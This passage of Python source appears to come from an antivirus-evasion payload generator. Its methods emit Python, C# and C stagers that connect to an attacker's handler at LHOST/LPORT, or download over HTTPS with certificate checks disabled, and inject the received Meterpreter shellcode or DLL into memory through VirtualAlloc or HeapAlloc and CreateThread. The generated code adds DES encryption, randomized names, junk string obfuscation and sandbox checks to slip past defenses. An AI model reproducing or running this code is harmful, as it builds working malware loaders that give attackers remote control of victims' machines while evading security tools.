first string obfuscation method code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0]) # real - check if the buffer received is null, if so punt the socket code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name) # real - prepend some buffer magic to push the socket number onto the stack code += "%s[0] = 0xBF;" %(buffer_name) # real- copy the 4 magic bytes into the buffer code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, evasion_helpers.obfuscateNum(4,2)) # obsufcation - malloc our third string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length)) # obsufcation - second string obfuscation method code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0]) # real - receive all data from the socket code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, evasion_helpers.obfuscateNum(5,2), size_name) code += "%s = (void (*)())%s;" %(function_name, buffer_name) code += "%s();" %(function_name) # obsufcation - third string obfuscation method (never called) code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0]) code += "} return; }\n" # service control handler code code += """void ControlHandler(DWORD request) { switch(request) { case SERVICE_CONTROL_STOP: ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCurrentState = SERVICE_STOPPED; SetServiceStatus (%s, &ServiceStatus); return; case SERVICE_CONTROL_SHUTDOWN: ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCurrentState = SERVICE_STOPPED; SetServiceStatus (%s, &ServiceStatus); return; default: break; } SetServiceStatus (%s, &ServiceStatus); return; } """ %(hStatusName, hStatusName, hStatusName) self.payload_source_code = code return
def generate(self): # randomize all of the variable names used shellCodeName = evasion_helpers.randomString() socketName = evasion_helpers.randomString() clientSocketName = evasion_helpers.randomString() getDataMethodName = evasion_helpers.randomString() fdBufName = evasion_helpers.randomString() rcvStringName = evasion_helpers.randomString() rcvCStringName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() tempShellcodeName = evasion_helpers.randomString() shellcodeBufName = evasion_helpers.randomString() fpName = evasion_helpers.randomString() tempCBuffer = evasion_helpers.randomString() payload_code = "import struct, socket, binascii, ctypes, random, time\n" # socket and shellcode variables that need to be kept global payload_code += "%s, %s = None, None\n" % (shellCodeName, socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payload_code += "def %s():\n" % (getDataMethodName) payload_code += "\ttry:\n" payload_code += "\t\tglobal %s\n" % (socketName) payload_code += "\t\tglobal %s\n" % (clientSocketName) # build the socket and connect to the handler payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % ( socketName) payload_code += "\t\t%s.bind(('%s', %s))\n" % ( socketName, self.required_options["RHOST"][0], str(self.required_options["LPORT"][0])) payload_code += "\t\t%s.listen(1)\n" % (socketName) payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName) # pack the underlying socket file descriptor into a c structure payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % ( fdBufName, clientSocketName) # unpack the length of the payload, received as a 4 byte array from the handler payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % ( clientSocketName) payload_code += "\t\t" + rcvStringName + " = b\" \"\n" # receive ALL of the payload .dll data payload_code += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % ( rcvStringName, rcvStringName, clientSocketName) payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % ( rcvCStringName, rcvStringName, rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" % ( rcvCStringName) # copy the socket fd in payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % ( rcvCStringName, fdBufName) payload_code += "\t\treturn %s\n" % (rcvCStringName) payload_code += "\texcept: return None\n" # build the method that injects the .dll into memory payload_code += "def %s(%s):\n" % (injectMethodName, tempShellcodeName) payload_code += "\tif %s != None:\n" % (tempShellcodeName) payload_code += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName, tempShellcodeName) # allocate enough virtual memory to stuff the .dll in payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % ( fpName, shellcodeBufName) # virtual lock to prevent the memory from paging out to disk payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % ( fpName, shellcodeBufName) payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % ( tempCBuffer, shellcodeBufName, shellcodeBufName) # copy the .dll into the allocated memory payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % ( fpName, tempCBuffer, shellcodeBufName) # kick the thread off to execute the .dll payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % ( fpName) # wait for the .dll execution to finish payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n" # download the stager payload_code += "%s = %s()\n" % (shellCodeName, getDataMethodName) # inject what we grabbed payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the variable names randctypes = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() RandDESPayload = evasion_helpers.randomString() RandEncShellCodePayload = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('latin-1') Shellcode = Shellcode.decode('unicode_escape') payload_code, num_tabs_required = gamemaker.senecas_games(self) # encrypt the shellcode and get our randomized key encoded_ciphertext, encryption_key, iv_value = encryption.des_encryption( Shellcode) encoded_ciphertext = encoded_ciphertext.decode('ascii') if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # Create Payload File payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n' payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' elif self.required_options["INJECT_METHOD"][0].lower() == "heap": # Generate Random Variable Names HeapVar = evasion_helpers.randomString() # Create Payload File payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n' payload_code += '\t' * num_tabs_required + 'import base64\n' payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n' payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n' payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n' payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n' payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n' payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # randomize all of the variable names used shellCodeName = evasion_helpers.randomString() socketName = evasion_helpers.randomString() getDataMethodName = evasion_helpers.randomString() fdBufName = evasion_helpers.randomString() rcvStringName = evasion_helpers.randomString() rcvCStringName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() tempShellcodeName = evasion_helpers.randomString() shellcodeBufName = evasion_helpers.randomString() fpName = evasion_helpers.randomString() tempCBuffer = evasion_helpers.randomString() randctypes = evasion_helpers.randomString() payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n" # How I'm tracking the number of nested tabs needed # to make the payload num_tabs_required = 0 if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Create Payload code payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n' payload_code += '\t' * num_tabs_required + 'from datetime import date\n' payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n' payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import platform\n' payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n' payload_code += '\t' * num_tabs_required + 'if \"' + self.required_options["HOSTNAME"][0].lower() + '\" in ' + rand_hostname + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import socket\n' payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n' payload_code += '\t' * num_tabs_required + 'if \"' + self.required_options["DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["PROCESSORS"][0].lower() != "x": rand_processor_count = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import multiprocessing\n' payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n' payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options["PROCESSORS"][0] + ':\n' # Add a tab for this check num_tabs_required += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + 'import getpass\n' payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n' payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options["USERNAME"][0].lower() + '\' in ' + rand_user_name + '.lower():\n' # Add a tab for this check num_tabs_required += 1 # socket and shellcode variables that need to be kept global payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % (shellCodeName,socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payload_code += '\t' * num_tabs_required + "def %s():\n" %(getDataMethodName) payload_code += '\t' * num_tabs_required + "\ttry:\n" payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" %(socketName) # build the socket and connect to the handler payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName) payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" %(socketName,self.required_options["LHOST"][0],self.required_options["LPORT"][0]) # pack the underlying socket file descriptor into a c structure payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,socketName) # unpack the length of the payload, received as a 4 byte array from the handler payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(socketName) payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % (rcvStringName) # receive ALL of the payload .dll data payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName) payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % (rcvStringName,rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName) # copy the socket fd in payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName) payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % (rcvCStringName) payload_code += '\t' * num_tabs_required + "\texcept: return None\n" # build the method that injects the .dll into memory payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName,tempShellcodeName) payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" %(tempShellcodeName) payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # allocate enough virtual memory to stuff the .dll in payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n" # virtual lock to prevent the memory from paging out to disk payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n" # copy the .dll into the allocated memory payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n" # kick the thread off to execute the .dll payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n" # wait for the .dll execution to finish payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n" # Assume HEAP Injection else: HeapVar = evasion_helpers.randomString() handleName = evasion_helpers.randomString() payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n' payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n' payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n' payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n' # download the stager payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName) # inject what we grabbed payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # imports and namespace setup payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n" payload_code += "namespace %s { class %s {\n" % ( evasion_helpers.randomString(), evasion_helpers.randomString()) # code for the randomString() function randomStringName = evasion_helpers.randomString() bufferName = evasion_helpers.randomString() charsName = evasion_helpers.randomString() t = list( "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") random.shuffle(t) chars = ''.join(t) # logic to turn off certificate validation validateServerCertficateName = evasion_helpers.randomString() payload_code += "private static bool %s(object sender, System.Security.Cryptography.X509Certificates.X509Certificate cert,System.Security.Cryptography.X509Certificates.X509Chain chain,System.Net.Security.SslPolicyErrors sslPolicyErrors) { return true; }\n" % ( validateServerCertficateName) # code for the randomString() method payload_code += "static string %s(Random r, int s) {\n" % ( randomStringName) payload_code += "char[] %s = new char[s];\n" % (bufferName) payload_code += "string %s = \"%s\";\n" % (charsName, chars) payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % ( bufferName, charsName, charsName) payload_code += "return new string(%s);}\n" % (bufferName) # code for the checksum8() function checksum8Name = evasion_helpers.randomString() payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % ( checksum8Name) # code fo the genHTTPChecksum() function genHTTPChecksumName = evasion_helpers.randomString() baseStringName = evasion_helpers.randomString() randCharsName = evasion_helpers.randomString() urlName = evasion_helpers.randomString() random.shuffle(t) randChars = ''.join(t) payload_code += "static string %s(Random r) { string %s = \"\";\n" % ( genHTTPChecksumName, baseStringName) payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % ( baseStringName, randomStringName) payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % ( randCharsName, randChars) payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % ( randCharsName) payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName, randCharsName) payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % ( checksum8Name, urlName, urlName) # code for getData() function getDataName = evasion_helpers.randomString() strName = evasion_helpers.randomString() webClientName = evasion_helpers.randomString() sName = evasion_helpers.randomString() payload_code += "static byte[] %s(string %s) {\n" % (getDataName, strName) payload_code += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" % ( validateServerCertficateName) payload_code += "WebClient %s = new System.Net.WebClient();\n" % ( webClientName) payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % ( webClientName) payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % ( webClientName) payload_code += "byte[] %s = null;\n" % (sName) payload_code += "try { %s = %s.DownloadData(%s);\n" % ( sName, webClientName, strName) payload_code += "if (%s.Length < 100000) return null;}\n" % (sName) payload_code += "catch (WebException) {}\n" payload_code += "return %s;}\n" % (sName) # code fo the inject() function to inject shellcode injectName = evasion_helpers.randomString() sName = evasion_helpers.randomString() funcAddrName = evasion_helpers.randomString() hThreadName = evasion_helpers.randomString() threadIdName = evasion_helpers.randomString() pinfoName = evasion_helpers.randomString() if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += " UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % ( funcAddrName, sName) payload_code += " Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % ( sName, funcAddrName, sName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % ( hThreadName) payload_code += " UInt32 %s = 0;\n" % (threadIdName) payload_code += " IntPtr %s = IntPtr.Zero;\n" % (pinfoName) payload_code += " %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % ( hThreadName, funcAddrName, pinfoName, threadIdName) payload_code += " WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % ( hThreadName) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += "static void %s(byte[] %s) {\n" % (injectName, sName) payload_code += " if (%s != null) {\n" % (sName) payload_code += ' UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format( pinfoName, sName) payload_code += ' UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format( funcAddrName, pinfoName, sName) payload_code += ' RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format( funcAddrName, sName, sName) payload_code += ' UInt32 {} = 0;\n'.format(threadIdName) payload_code += ' IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format( hThreadName, funcAddrName, threadIdName) payload_code += ' WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format( hThreadName) # code for Main() to launch everything sName = evasion_helpers.randomString() randomName = evasion_helpers.randomString() curlyCount = 0 payload_code += "static void Main(){\n" if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format( RandToday) payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format( RandExpire, RandToday, self.required_options["EXPIRE_PAYLOAD"][0]) payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format( RandExpire, RandToday) # Add a tab for this check curlyCount += 1 if self.required_options["HOSTNAME"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format( self.required_options["HOSTNAME"][0].lower()) # Add a tab for this check curlyCount += 1 if self.required_options["DOMAIN"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check curlyCount += 1 if self.required_options["PROCESSORS"][0].lower() != "x": payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format( self.required_options["PROCESSORS"][0]) # Add a tab for this check curlyCount += 1 if self.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format( rand_user_name) payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format( rand_char_name, rand_user_name) payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format( rand_char_name, self.required_options["USERNAME"][0]) # Add a tab for this check curlyCount += 1 payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % ( randomName) payload_code += "byte[] %s = %s(\"https://%s:%s/\" + %s(%s));\n" % ( sName, getDataName, self.required_options["LHOST"][0], self.required_options["LPORT"][0], genHTTPChecksumName, randomName) payload_code += "%s(%s);}\n" % (injectName, sName) while (curlyCount != 0): payload_code += '\t' * curlyCount + '}' curlyCount -= 1 # get 12 random variables for the API imports r = [evasion_helpers.randomString() for x in range(12)] y = [evasion_helpers.randomString() for x in range(17)] if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % ( y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9], y[10], y[11], y[12], y[13], y[14], y[15], y[16]) if self.required_options["USE_ARYA"][0].lower() == "y": payload_code = encryption.arya(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode # Base64 Encode Shellcode Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:]) Shellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii') # randomize all our variable names, yo' namespaceName = evasion_helpers.randomString() className = evasion_helpers.randomString() bytearrayName = evasion_helpers.randomString() funcAddrName = evasion_helpers.randomString() shellcodeName = evasion_helpers.randomString() hThreadName = evasion_helpers.randomString() threadIdName = evasion_helpers.randomString() pinfoName = evasion_helpers.randomString() num_tabs_required = 0 # get 12 random variables for the API imports r = [evasion_helpers.randomString() for x in range(12)] y = [evasion_helpers.randomString() for x in range(17)] #required syntax at the beginning of any/all payloads payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading;\n" payload_code += "namespace %s { class %s {\n" % (namespaceName, className) if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % ( r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9], r[10], r[11]) elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 